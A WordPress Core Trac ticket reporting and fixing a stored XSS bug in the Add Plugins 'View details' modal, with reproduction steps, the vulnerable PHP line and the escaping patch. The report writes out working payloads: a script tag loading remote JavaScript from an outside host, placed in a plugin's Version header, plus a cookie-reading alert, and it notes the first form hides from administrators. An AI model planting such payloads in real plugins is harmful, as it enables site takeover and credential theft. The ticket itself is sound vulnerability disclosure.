Make WordPress Core

Opened 3 years ago

Closed 3 years ago

#53020 closed defect (bug) (fixed)

Stored XSS via «View details» plugin iFrame

Reported by: anonymized_17160716's profile anonymized_17160716 Owned by: sergeybiryukov's profile SergeyBiryukov
Milestone: 5.8 Priority: normal
Severity: normal Version: 5.8
Component: Security Keywords: has-patch
Focuses: administration Cc:

Description

I found a way to use the XSS attack vector - through an iFrame with a detailed description of the plugin (plugin «View details» iFrame).

Possible operation options:

  • substitution or modification of the original plug-in to hide malicious code;
  • distribution of the modified plugin through third-party resources.

Steps To Reproduce:

  1. open any existed plugin from the official WordPress repo, f.e. Hello Dolly.
  2. change the version number to +1 (as a minimum) - from Version: 1.7.2 to Version: 1.7.3.
  3. add your payload right after the last digit - Version: 1.7.3<script src="https://m0ze.ru/payload.a.js"></script>
  4. check the plugin info via dashboard, «View details» link.

If you use the payload specifically as a <script src=...></script>, then visually, except for one digit in the plugin version, nothing will change. Other payloads also work (<script>alert(document.cookie)</script> etc.), but they add extra special characters on the right of the plugin version, which may alert the website administrator.

Screenshots:

https://i.imgur.com/7pz6UMh.png

https://i.imgur.com/E7ejGkJ.png

https://i.imgur.com/r2WQmFQ.png

Code:

/wp-admin/includes/plugin-install.php, 881-884:

case 'newer_installed':
        /* translators: %s: Plugin version. */
        echo '<a class="button button-primary right disabled">' . sprintf( __( 'Newer Version (%s) Installed' ), $status['version'] ) . '</a>';
break;

Quick fix:

strip_tags($status['version'])

Video:

YouTube short demo: https://youtu.be/_IRcQ82wovY

Impact

Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.

There is also an unknown number of plugins that display diagnostic information about the site, including the names and versions of plugins, where this vulnerability will also be triggered, f.e.: Asset CleanUp: Page Speed Booster, WP Cerber Security, Anti-spam & Malware Scan and many other plugins.

Attachments (1)

plugin-install.diff (769 bytes) - added by bmcculley 3 years ago.

Download all attachments as: .zip

Change History (7)

#1 @ayeshrajans
3 years ago

Thanks for the report @m0ze. Not without some tinkering, but I could reproduce this issue, and I think it's really we ought to fix.

Please note that we don't use Trac to report/triage security issue. Please see SECURITY.md with full details on how to report a security vulnerability.

#2 @anonymized_17160716
3 years ago

Hi @ayeshrajans.

Please note that we don't use Trac to report/triage security issue. Please see SECURITY.md with full details on how to report a security vulnerability.

On the H1 platform, this XSS issue wasn't considered as a vulnerability, so the WordPress Staff member closed the report with N/A status and I was told to write all details right here, in a new ticket.

https://i.imgur.com/KhF0cyF.png

#3 @SergeyBiryukov
3 years ago

  • Milestone changed from Awaiting Review to 5.8

Hi there, welcome to WordPress Trac! Thanks for the report.

I think we'd want to use esc_html() here instead of strip_tags(), for consistency with how contributor names are escaped earlier. Looks good to me otherwise.

#4 @anonymized_17160716
3 years ago

@SergeyBiryukov hi there. Thank you :)

I think we'd want to use esc_html() here instead of strip_tags(), for consistency with how contributor names are escaped earlier​.

Yep, got it!

#5 @bmcculley
3 years ago

  • Keywords has-patch added; needs-patch removed

I wanted to note that in order to test this, if using the Hello Dolly plugin. It must first be deleted and then reinstalled so that the newer_installed case will be reached. If the one that comes by default is used it will only go to install.

#6 @SergeyBiryukov
3 years ago

  • Owner set to SergeyBiryukov
  • Resolution set to fixed
  • Status changed from new to closed

In 50825:

Plugins: Escape the currently installed version number on Add Plugins screen.

The number is displayed in the plugin details modal if a newer version is already installed.

Props m0ze, bmcculley, ayeshrajans.
Fixes #53020.

Note: See TracTickets for help on using tickets.